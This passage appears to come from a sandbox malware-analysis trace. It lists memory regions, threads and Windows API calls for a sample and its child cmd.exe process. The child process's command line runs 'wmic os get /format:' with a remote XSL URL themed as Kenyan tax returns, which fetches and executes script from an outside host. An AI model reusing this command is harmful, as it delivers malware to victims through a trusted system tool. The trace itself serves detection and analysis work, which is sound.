"c:\\windows\\system32\\sxs.dll") Region: id = 2127 start_va = 0x20f94460000 end_va = 0x20f94461fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f94460000" filename = "" Region: id = 2128 start_va = 0x20f94480000 end_va = 0x20f94481fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f94480000" filename = "" Region: id = 2129 start_va = 0x20f94500000 end_va = 0x20f9450ffff entry_point = 0x0 region_type = private name = "private_0x0000020f94500000" filename = "" Region: id = 2130 start_va = 0x20f94510000 end_va = 0x20f9451ffff entry_point = 0x0 region_type = private name = "private_0x0000020f94510000" filename = "" Region: id = 2131 start_va = 0x20f94520000 end_va = 0x20f9452bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f94520000" filename = "" Region: id = 2132 start_va = 0x20f94540000 end_va = 0x20f9454bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f94540000" filename = "" Region: id = 2133 start_va = 0x20f97fe0000 end_va = 0x20f97fe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f97fe0000" filename = "" Region: id = 2134 start_va = 0x20f993a0000 end_va = 0x20f993a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f993a0000" filename = "" Region: id = 2135 start_va = 0x20f993b0000 end_va = 0x20f993cefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f993b0000" filename = "" Region: id = 2136 start_va = 0x20f993d0000 end_va = 0x20f998adfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f993d0000" filename = "" Region: id = 2137 start_va = 0x20f998b0000 end_va = 0x20f998e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f998b0000" filename = "" Region: id = 2138 start_va = 0x20f998f0000 end_va = 0x20f998fafff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f998f0000" filename = "" Region: id = 2139 start_va = 0x20f99900000 end_va = 0x20f99900fff entry_point = 0x0 region_type = private name = "private_0x0000020f99900000" filename = "" Region: id = 2140 start_va = 0x20f99930000 end_va = 0x20f99965fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f99930000" filename = "" Region: id = 2141 start_va = 0x20f99970000 end_va = 0x20f9998efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f99970000" filename = "" Region: id = 2142 start_va = 0x20f99990000 end_va = 0x20f99990fff entry_point = 0x0 region_type = private name = "private_0x0000020f99990000" filename = "" Region: id = 2143 start_va = 0x20f999a0000 end_va = 0x20f99a75fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f999a0000" filename = "" Region: id = 2144 start_va = 0x20f99a80000 end_va = 0x20f99b55fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f99a80000" filename = "" Region: id = 2145 start_va = 0x20f99b60000 end_va = 0x20f99b6afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f99b60000" filename = "" Region: id = 2146 start_va = 0x20f99b70000 end_va = 0x20f99b78fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f99b70000" filename = "" Region: id = 2147 start_va = 0x20f99b80000 end_va = 0x20f99b88fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f99b80000" filename = "" Region: id = 2148 start_va = 0x20f99c10000 end_va = 0x20f99c10fff entry_point = 0x0 region_type = private name = "private_0x0000020f99c10000" filename = "" Region: id = 2149 start_va = 0x20f9b560000 end_va = 0x20f9b65ffff entry_point = 0x0 region_type = private name = "private_0x0000020f9b560000" filename = "" Region: id = 2150 start_va = 0x20f9c950000 end_va = 0x20f9c95ffff entry_point = 0x0 region_type = private name = "private_0x0000020f9c950000" filename = "" Region: id = 2151 start_va = 0x20f9cc10000 end_va = 0x20f9cc1ffff entry_point = 0x0 region_type = private name = "private_0x0000020f9cc10000" filename = "" Region: id = 2152 start_va = 0x7ff6c4dc0000 end_va = 0x7ff6c4dcffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4dc0000" filename = "" Region: id = 2154 start_va = 0x20f94550000 end_va = 0x20f9455ffff entry_point = 0x0 region_type = private name = "private_0x0000020f94550000" filename = "" Region: id = 2155 start_va = 0x20f94560000 end_va = 0x20f9456ffff entry_point = 0x0 region_type = private name = "private_0x0000020f94560000" filename = "" Region: id = 2156 start_va = 0x20f94570000 end_va = 0x20f94571fff entry_point = 0x0 region_type = private name = "private_0x0000020f94570000" filename = "" Region: id = 2157 start_va = 0x20f94580000 end_va = 0x20f94580fff entry_point = 0x0 region_type = private name = "private_0x0000020f94580000" filename = "" Region: id = 2158 start_va = 0x20f972e0000 end_va = 0x20f972effff entry_point = 0x0 region_type = private name = "private_0x0000020f972e0000" filename = "" Region: id = 2159 start_va = 0x20f972f0000 end_va = 0x20f972fffff entry_point = 0x0 region_type = private name = "private_0x0000020f972f0000" filename = "" Region: id = 2160 start_va = 0x20f97300000 end_va = 0x20f97300fff entry_point = 0x0 region_type = private name = "private_0x0000020f97300000" filename = "" Region: id = 2161 start_va = 0x20f97310000 end_va = 0x20f97310fff entry_point = 0x0 region_type = private name = "private_0x0000020f97310000" filename = "" Region: id = 2162 start_va = 0x20f97320000 end_va = 0x20f97320fff entry_point = 0x0 region_type = private name = "private_0x0000020f97320000" filename = "" Region: id = 2163 start_va = 0x20f97340000 end_va = 0x20f97356fff entry_point = 0x0 region_type = private name = "private_0x0000020f97340000" filename = "" Region: id = 2164 start_va = 0x20f97360000 end_va = 0x20f97360fff entry_point = 0x0 region_type = private name = "private_0x0000020f97360000" filename = "" Region: id = 2165 start_va = 0x20f97370000 end_va = 0x20f97372fff entry_point = 0x0 region_type = private name = "private_0x0000020f97370000" filename = "" Region: id = 2166 start_va = 0x20f99130000 end_va = 0x20f99132fff entry_point = 0x0 region_type = private name = "private_0x0000020f99130000" filename = "" Region: id = 2167 start_va = 0x20f99390000 end_va = 0x20f99390fff entry_point = 0x0 region_type = private name = "private_0x0000020f99390000" filename = "" Region: id = 2168 start_va = 0x20f99910000 end_va = 0x20f99913fff entry_point = 0x0 region_type = private name = "private_0x0000020f99910000" filename = "" Region: id = 2169 start_va = 0x20f99920000 end_va = 0x20f99924fff entry_point = 0x0 region_type = private name = "private_0x0000020f99920000" filename = "" Region: id = 2170 start_va = 0x20f99b90000 end_va = 0x20f99b90fff entry_point = 0x0 region_type = private name = "private_0x0000020f99b90000" filename = "" Region: id = 2171 start_va = 0x20f99ba0000 end_va = 0x20f99ba2fff entry_point = 0x0 region_type = private name = "private_0x0000020f99ba0000" filename = "" Region: id = 2172 start_va = 0x20f99bb0000 end_va = 0x20f99bb0fff entry_point = 0x0 region_type = private name = "private_0x0000020f99bb0000" filename = "" Region: id = 2173 start_va = 0x20f9b660000 end_va = 0x20f9b9b3fff entry_point = 0x0 region_type = private name = "private_0x0000020f9b660000" filename = "" Region: id = 2174 start_va = 0x7ff6c4db0000 end_va = 0x7ff6c4dbffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4db0000" filename = "" Region: id = 2484 start_va = 0x8192500000 end_va = 0x81925fffff entry_point = 0x0 region_type = private name = "private_0x0000008192500000" filename = "" Region: id = 2485 start_va = 0x20f94570000 end_va = 0x20f94570fff entry_point = 0x0 region_type = private name = "private_0x0000020f94570000" filename = "" Region: id = 2486 start_va = 0x20f97250000 end_va = 0x20f97253fff entry_point = 0x0 region_type = private name = "private_0x0000020f97250000" filename = "" Region: id = 2487 start_va = 0x20f97260000 end_va = 0x20f97263fff entry_point = 0x0 region_type = private name = "private_0x0000020f97260000" filename = "" Region: id = 2488 start_va = 0x20f97270000 end_va = 0x20f97273fff entry_point = 0x0 region_type = private name = "private_0x0000020f97270000" filename = "" Region: id = 2489 start_va = 0x20f97280000 end_va = 0x20f97283fff entry_point = 0x0 region_type = private name = "private_0x0000020f97280000" filename = "" Region: id = 2490 start_va = 0x20f97290000 end_va = 0x20f972a9fff entry_point = 0x0 region_type = private name = "private_0x0000020f97290000" filename = "" Region: id = 2491 start_va = 0x20f972b0000 end_va = 0x20f972b2fff entry_point = 0x0 region_type = private name = "private_0x0000020f972b0000" filename = "" Region: id = 2492 start_va = 0x20f972c0000 end_va = 0x20f972c0fff entry_point = 0x0 region_type = private name = "private_0x0000020f972c0000" filename = "" Region: id = 2493 start_va = 0x20f972d0000 end_va = 0x20f972d0fff entry_point = 0x0 region_type = private name = "private_0x0000020f972d0000" filename = "" Region: id = 2494 start_va = 0x20f972e0000 end_va = 0x20f972e0fff entry_point = 0x0 region_type = private name = "private_0x0000020f972e0000" filename = "" Region: id = 2495 start_va = 0x20f972f0000 end_va = 0x20f972f0fff entry_point = 0x0 region_type = private name = "private_0x0000020f972f0000" filename = "" Region: id = 2496 start_va = 0x20f97320000 end_va = 0x20f97321fff entry_point = 0x0 region_type = private name = "private_0x0000020f97320000" filename = "" Region: id = 2497 start_va = 0x20f97340000 end_va = 0x20f97340fff entry_point = 0x0 region_type = private name = "private_0x0000020f97340000" filename = "" Region: id = 2498 start_va = 0x7ffc01c60000 end_va = 0x7ffc01f98fff entry_point = 0x7ffc01c60000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 2499 start_va = 0x8192600000 end_va = 0x81926fffff entry_point = 0x0 region_type = private name = "private_0x0000008192600000" filename = "" Region: id = 2500 start_va = 0x8192700000 end_va = 0x81927fffff entry_point = 0x0 region_type = private name = "private_0x0000008192700000" filename = "" Region: id = 2501 start_va = 0x20f97280000 end_va = 0x20f97282fff entry_point = 0x0 region_type = private name = "private_0x0000020f97280000" filename = "" Region: id = 2502 start_va = 0x20f972b0000 end_va = 0x20f972b0fff entry_point = 0x0 region_type = private name = "private_0x0000020f972b0000" filename = "" Region: id = 2503 start_va = 0x20f97300000 end_va = 0x20f97303fff entry_point = 0x0 region_type = private name = "private_0x0000020f97300000" filename = "" Region: id = 2504 start_va = 0x20f97350000 end_va = 0x20f97350fff entry_point = 0x0 region_type = private name = "private_0x0000020f97350000" filename = "" Region: id = 2505 start_va = 0x20f97360000 end_va = 0x20f97360fff entry_point = 0x0 region_type = private name = "private_0x0000020f97360000" filename = "" Region: id = 2506 start_va = 0x7ffc0d0c0000 end_va = 0x7ffc0d0d8fff entry_point = 0x7ffc0d0c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2507 start_va = 0x7ffc12080000 end_va = 0x7ffc1209bfff entry_point = 0x7ffc12080000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2508 start_va = 0x7ffc05aa0000 end_va = 0x7ffc05b09fff entry_point = 0x7ffc05aa0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 2509 start_va = 0xa380000 end_va = 0xa380fff entry_point = 0x0 region_type = private name = "private_0x000000000a380000" filename = "" Region: id = 2510 start_va = 0xa390000 end_va = 0xa390fff entry_point = 0x0 region_type = private name = "private_0x000000000a390000" filename = "" Region: id = 2511 start_va = 0x8192800000 end_va = 0x81928fffff entry_point = 0x0 region_type = private name = "private_0x0000008192800000" filename = "" Region: id = 2512 start_va = 0x20f97370000 end_va = 0x20f97371fff entry_point = 0x20f97370000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 2513 start_va = 0x20f99130000 end_va = 0x20f99131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f99130000" filename = "" Region: id = 2514 start_va = 0x20f9b660000 end_va = 0x20f9b7b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9b660000" filename = "" Region: id = 2515 start_va = 0x7ffc0a910000 end_va = 0x7ffc0ab12fff entry_point = 0x7ffc0a910000 region_type = mapped_file name = "wpdshext.dll" filename = "\\Windows\\System32\\wpdshext.dll" (normalized: "c:\\windows\\system32\\wpdshext.dll") Thread: id = 1 os_tid = 0xc88 Thread: id = 2 os_tid = 0xc7c Thread: id = 3 os_tid = 0xc58 Thread: id = 4 os_tid = 0xc3c Thread: id = 5 os_tid = 0xc2c Thread: id = 6 os_tid = 0xc18 Thread: id = 7 os_tid = 0xc04 Thread: id = 8 os_tid = 0x36c Thread: id = 9 os_tid = 0xff4 Thread: id = 10 os_tid = 0xff0 Thread: id = 11 os_tid = 0xfd0 Thread: id = 12 os_tid = 0xfa8 Thread: id = 13 os_tid = 0xfa0 Thread: id = 14 os_tid = 0xf94 Thread: id = 15 os_tid = 0xf84 Thread: id = 16 os_tid = 0xf30 Thread: id = 17 os_tid = 0xf20 Thread: id = 18 os_tid = 0xf18 Thread: id = 19 os_tid = 0xf14 [0580.983] CClassCache::CleanUpLocalServersForApartment () Thread: id = 20 os_tid = 0xf10 Thread: id = 21 os_tid = 0xf08 Thread: id = 22 os_tid = 0xf04 Thread: id = 23 os_tid = 0xf00 Thread: id = 24 os_tid = 0xefc Thread: id = 25 os_tid = 0xef8 Thread: id = 26 os_tid = 0xef4 Thread: id = 27 os_tid = 0xef0 Thread: id = 28 os_tid = 0xeec Thread: id = 29 os_tid = 0xee0 Thread: id = 30 os_tid = 0xedc Thread: id = 31 os_tid = 0xb10 Thread: id = 32 os_tid = 0x2dc Thread: id = 178 os_tid = 0xf1c Thread: id = 179 os_tid = 0xf74 Thread: id = 260 os_tid = 0xde4 Thread: id = 261 os_tid = 0xb88 Thread: id = 262 os_tid = 0xb50 Thread: id = 263 os_tid = 0xc28 Thread: id = 264 os_tid = 0xc40 Thread: id = 265 os_tid = 0xc54 Thread: id = 266 os_tid = 0x774 Thread: id = 275 os_tid = 0xf98 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x39afc000" os_pid = "0xccc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xed8" cmd_line = "CMD.EXE /C wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" " cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\" os_username = "X2VS1CUM\\Nd9E1FYi" os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb37" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 506 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 507 start_va = 0x194dd00000 end_va = 0x194ddfffff entry_point = 0x0 region_type = private name = "private_0x000000194dd00000" filename = "" Region: id = 508 start_va = 0x194de00000 end_va = 0x194dffffff entry_point = 0x0 region_type = private name = "private_0x000000194de00000" filename = "" Region: id = 509 start_va = 0x1ebe75c0000 end_va = 0x1ebe75dffff entry_point = 0x0 region_type = private name = "private_0x000001ebe75c0000" filename = "" Region: id = 510 start_va = 0x1ebe75e0000 end_va = 0x1ebe75f4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001ebe75e0000" filename = "" Region: id = 511 start_va = 0x1ebe7600000 end_va = 0x1ebe7603fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001ebe7600000" filename = "" Region: id = 512 start_va = 0x1ebe7610000 end_va = 0x1ebe7610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001ebe7610000" filename = "" Region: id = 513 start_va = 0x1ebe7620000 end_va = 0x1ebe7621fff entry_point = 0x0 region_type = private name = "private_0x000001ebe7620000" filename = "" Region: id = 514 start_va = 0x7df5ffa10000 end_va = 0x7ff5ffa0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa10000" filename = "" Region: id = 515 start_va = 0x7ff648f50000 end_va = 0x7ff648f72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff648f50000" filename = "" Region: id = 516 start_va = 0x7ff649110000 end_va = 0x7ff649169fff entry_point = 0x7ff649110000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 517 start_va = 0x7ffc17400000 end_va = 0x7ffc175c0fff entry_point = 0x7ffc17400000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 518 start_va = 0x1ebe7630000 end_va = 0x1ebe772ffff entry_point = 0x0 region_type = private name = "private_0x000001ebe7630000" filename = "" Region: id = 519 start_va = 0x7ffc14550000 end_va = 0x7ffc14737fff entry_point = 0x7ffc14550000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 520 start_va = 0x7ffc17120000 end_va = 0x7ffc171ccfff entry_point = 0x7ffc17120000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 594 start_va = 0x194e000000 end_va = 0x194e0fffff entry_point = 0x0 region_type = private name = "private_0x000000194e000000" filename = "" Region: id = 595 start_va = 0x1ebe75c0000 end_va = 0x1ebe75cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001ebe75c0000" filename = "" Region: id = 596 start_va = 0x1ebe75d0000 end_va = 0x1ebe75d6fff entry_point = 0x0 region_type = private name = "private_0x000001ebe75d0000" filename = "" Region: id = 597 start_va = 0x1ebe7730000 end_va = 0x1ebe77edfff entry_point = 0x1ebe7730000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 598 start_va = 0x1ebe7970000 end_va = 0x1ebe797ffff entry_point = 0x0 region_type = private name = "private_0x000001ebe7970000" filename = "" Region: id = 599 start_va = 0x7ff648e50000 end_va = 0x7ff648f4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff648e50000" filename = "" Region: id = 600 start_va = 0x7ffc164b0000 end_va = 0x7ffc1654cfff entry_point = 0x7ffc164b0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 601 start_va = 0x1ebe77f0000 end_va = 0x1ebe77f6fff entry_point = 0x0 region_type = private name = "private_0x000001ebe77f0000" filename = "" Region: id = 602 start_va = 0x1ebe7980000 end_va = 0x1ebe7cb6fff entry_point = 0x1ebe7980000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 33 os_tid = 0xe0 [0048.736] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff649110000 [0048.736] __set_app_type (_Type=0x1) [0048.736] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff649125700) returned 0x0 [0048.736] __getmainargs (in: _Argc=0x7ff649140108, _Argv=0x7ff649140110, _Env=0x7ff649140118, _DoWildCard=0, _StartInfo=0x7ff649140124 | out: _Argc=0x7ff649140108, _Argv=0x7ff649140110, _Env=0x7ff649140118) returned 0 [0048.736] GetCurrentThreadId () returned 0xe0 [0048.736] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe0) returned 0x6c [0048.736] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffc17120000 [0048.737] GetProcAddress (hModule=0x7ffc17120000, lpProcName="SetThreadUILanguage") returned 0x7ffc17143270 [0048.737] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.744] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0048.744] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x194ddffea8 | out: phkResult=0x194ddffea8*=0x0) returned 0x2 [0048.745] VirtualQuery (in: lpAddress=0x194ddffe94, lpBuffer=0x194ddffe10, dwLength=0x30 | out: lpBuffer=0x194ddffe10*(BaseAddress=0x194ddff000, AllocationBase=0x194dd00000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0048.745] VirtualQuery (in: lpAddress=0x194dd00000, lpBuffer=0x194ddffe10, dwLength=0x30 | out: lpBuffer=0x194ddffe10*(BaseAddress=0x194dd00000, AllocationBase=0x194dd00000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0048.745] VirtualQuery (in: lpAddress=0x194dd01000, lpBuffer=0x194ddffe10, dwLength=0x30 | out: lpBuffer=0x194ddffe10*(BaseAddress=0x194dd01000, AllocationBase=0x194dd00000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0048.745] VirtualQuery (in: lpAddress=0x194dd04000, lpBuffer=0x194ddffe10, dwLength=0x30 | out: lpBuffer=0x194ddffe10*(BaseAddress=0x194dd04000, AllocationBase=0x194dd00000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0048.745] VirtualQuery (in: lpAddress=0x194de00000, lpBuffer=0x194ddffe10, dwLength=0x30 | out: lpBuffer=0x194ddffe10*(BaseAddress=0x194de00000, AllocationBase=0x194de00000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x1d7000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0048.745] GetConsoleOutputCP () returned 0x1b5 [0048.745] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff649149660 | out: lpCPInfo=0x7ff649149660) returned 1 [0048.745] SetConsoleCtrlHandler (HandlerRoutine=0x7ff649132ad0, Add=1) returned 1 [0048.745] _get_osfhandle (_FileHandle=1) returned 0x24 [0048.745] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x0) returned 1 [0048.746] _get_osfhandle (_FileHandle=1) returned 0x24 [0048.746] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff64914960c | out: lpMode=0x7ff64914960c) returned 1 [0048.746] _get_osfhandle (_FileHandle=1) returned 0x24 [0048.746] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0048.746] _get_osfhandle (_FileHandle=0) returned 0x20 [0048.746] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff649149608 | out: lpMode=0x7ff649149608) returned 1 [0048.746] _get_osfhandle (_FileHandle=0) returned 0x20 [0048.746] SetConsoleMode (hConsoleHandle=0x20, dwMode=0x1e7) returned 1 [0048.746] GetEnvironmentStringsW () returned 0x1ebe7635730* [0048.746] FreeEnvironmentStringsA (penv="=") returned 1 [0048.746] GetEnvironmentStringsW () returned 0x1ebe7635730* [0048.746] FreeEnvironmentStringsA (penv="=") returned 1 [0048.746] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x194ddfed58 | out: phkResult=0x194ddfed58*=0x78) returned 0x0 [0048.747] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x0, lpData=0x194ddfed70*=0x0, lpcbData=0x194ddfed54*=0x1000) returned 0x2 [0048.747] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x1, lpcbData=0x194ddfed54*=0x4) returned 0x0 [0048.747] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x0, lpData=0x194ddfed70*=0x1, lpcbData=0x194ddfed54*=0x1000) returned 0x2 [0048.747] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x0, lpcbData=0x194ddfed54*=0x4) returned 0x0 [0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x40, lpcbData=0x194ddfed54*=0x4) returned 0x0 [0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x40, lpcbData=0x194ddfed54*=0x4) returned 0x0 [0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x0, lpData=0x194ddfed70*=0x40, lpcbData=0x194ddfed54*=0x1000) returned 0x2 [0048.748] RegCloseKey (hKey=0x78) returned 0x0 [0048.748] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x194ddfed58 | out: phkResult=0x194ddfed58*=0x78) returned 0x0 [0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x0, lpData=0x194ddfed70*=0x40, lpcbData=0x194ddfed54*=0x1000) returned 0x2 [0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x1, lpcbData=0x194ddfed54*=0x4) returned 0x0 [0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x0, lpData=0x194ddfed70*=0x1, lpcbData=0x194ddfed54*=0x1000) returned 0x2 [0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x0, lpcbData=0x194ddfed54*=0x4) returned 0x0 [0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x9, lpcbData=0x194ddfed54*=0x4) returned 0x0 [0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x4, lpData=0x194ddfed70*=0x9, lpcbData=0x194ddfed54*=0x4) returned 0x0 [0048.748] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x194ddfed50, lpData=0x194ddfed70, lpcbData=0x194ddfed54*=0x1000 | out: lpType=0x194ddfed50*=0x0, lpData=0x194ddfed70*=0x9, lpcbData=0x194ddfed54*=0x1000) returned 0x2 [0048.748] RegCloseKey (hKey=0x78) returned 0x0 [0048.748] time (in: timer=0x0 | out: timer=0x0) returned 0x5b32a918 [0048.748] srand (_Seed=0x5b32a918) [0048.748] GetCommandLineW () returned="CMD.EXE /C wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" " [0048.748] GetCommandLineW () returned="CMD.EXE /C wmic os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" " [0048.748] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff649151940 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19 [0048.748] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ebe76379f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\CMD.EXE" (normalized: 